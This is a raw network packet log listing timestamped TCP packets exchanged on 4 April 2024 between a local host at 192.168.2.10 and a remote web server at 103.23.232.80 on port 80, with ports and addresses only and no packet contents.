Apr 4, 2024 17:49:07.210589886 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.210611105 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.210647106 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.210648060 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.210666895 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.210680008 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.210685968 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.210726023 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.210741997 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.210755110 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.210761070 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.210783958 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.210802078 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.210819006 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.210855007 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.210858107 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.210874081 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.210906982 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.210910082 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.210931063 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.210944891 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.211000919 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.211019993 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.211038113 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.211055994 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.211057901 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.211076021 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.211113930 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.211180925 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.211196899 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.211214066 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.211215019 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.211234093 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.211235046 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.211253881 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.211268902 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.211272955 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.211292028 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.211311102 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.211325884 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.211347103 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.211349010 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.211366892 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.211399078 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.211405993 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.211422920 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.211441994 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.211457968 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.211462021 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.211481094 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.211519003 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.211549997 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.211570024 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.211587906 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.211605072 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.211606026 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.211625099 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.211642981 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.211695910 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.211731911 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.211750984 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.211762905 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.211780071 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.211780071 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.211819887 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.211838007 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.211855888 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.211874008 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.211875916 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.211894035 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.211913109 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.211915016 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.211937904 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.211951971 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.211954117 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.211986065 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.212009907 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.212074995 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.212105036 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.212137938 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.212146997 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.212162971 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.212181091 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.212198019 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.212202072 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.212213993 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.212234020 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.212274075 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.212290049 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.212308884 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.212326050 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.212331057 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.212344885 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.212363958 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.212383032 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.212387085 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.212404966 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.212424040 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.212431908 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.212506056 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.212538004 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.212542057 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.212563038 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.212584019 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.212606907 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.212615013 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.212637901 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.212656975 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.212696075 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.212696075 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.212716103 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.212734938 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.212750912 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.212754011 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.212774038 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.212793112 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.212810040 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.212811947 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.212831020 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.212832928 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.212868929 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.212882042 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.212933064 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.212951899 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.212989092 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.212994099 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.213017941 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.213043928 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.213061094 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.213099957 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.213125944 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.213141918 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.213179111 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.213196039 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.213212013 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.213247061 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.213285923 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.213305950 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.213324070 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.213342905 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.213361979 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.213361979 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.213381052 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.213383913 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.213401079 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.213418007 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.213434935 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.213454008 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.213485956 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.213509083 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.213542938 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.213577032 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.213579893 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.213613033 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.213635921 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.213685989 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.213717937 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.213733912 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.213752985 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.213799000 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.213803053 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.213881969 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.213896990 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.213916063 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.213933945 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.213937998 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.213957071 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.213975906 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.213992119 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.214010954 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.214025021 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.214029074 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.214050055 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.214066029 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.214083910 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.214102030 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.214114904 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.214138985 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.214143038 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.214178085 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.214194059 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.214209080 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.214230061 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.214247942 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.214282990 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.214302063 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.214359999 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.214374065 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.214390039 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.214392900 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.214406013 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.214411974 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.214430094 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.214447975 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.214462042 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.214484930 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.214505911 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.214524031 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.214555979 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.214584112 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.214600086 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.214624882 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.214632988 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.214639902 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.214649916 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.214709997 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.214719057 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.214725971 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.214740038 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.214778900 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.214795113 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.214812040 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.214812994 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.214884996 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.214906931 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.214931011 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.214935064 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.214948893 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.214953899 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.214978933 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.214987993 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.214999914 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.215018988 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.215038061 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.215039968 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.215059042 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.215070963 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.215079069 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.215116024 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.215135098 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.215152979 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.215172052 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.215189934 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.215192080 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.215234041 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.215262890 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.215279102 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.215296984 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.215332031 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.215334892 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.215384007 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.215399981 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.215418100 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.215430975 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.215466976 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.215486050 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.215503931 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.215522051 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.215539932 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.215540886 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.215559959 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.215564013 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.215595961 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.215668917 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.215684891 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.215735912 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.215750933 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.215770006 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.215770960 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.215790033 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.215794086 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.215810061 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.215826035 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.215852022 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.215867996 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.215887070 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.215904951 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.215924978 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.215924978 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.215961933 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.215981007 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.216000080 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.216037035 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.216056108 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.216089010 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.216129065 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.216145039 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.216165066 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.216181040 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.216183901 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.216195107 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.216202974 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.216232061 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.216247082 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.216260910 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.216283083 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.216284990 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.216303110 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.216337919 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.216344118 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.216362000 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.216392994 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.216417074 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.216434002 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.216454983 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.216469049 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.216495037 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.216511011 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.216543913 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.216579914 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.216626883 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.216660023 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.216662884 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.216696024 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.216707945 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.216727972 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.216747046 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.216766119 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.216784000 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.216820955 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.216839075 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.216857910 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.216860056 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.216881037 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.216905117 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.217005014 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.217019081 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.217020988 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.217041016 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.217061043 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.217077971 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.217081070 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.217099905 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.217099905 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.217133999 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.217166901 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.217185020 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.217195988 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.217226982 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.217243910 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.217258930 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.217297077 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.217312098 CEST	80	49730	103.23.232.80	192.168.2.10
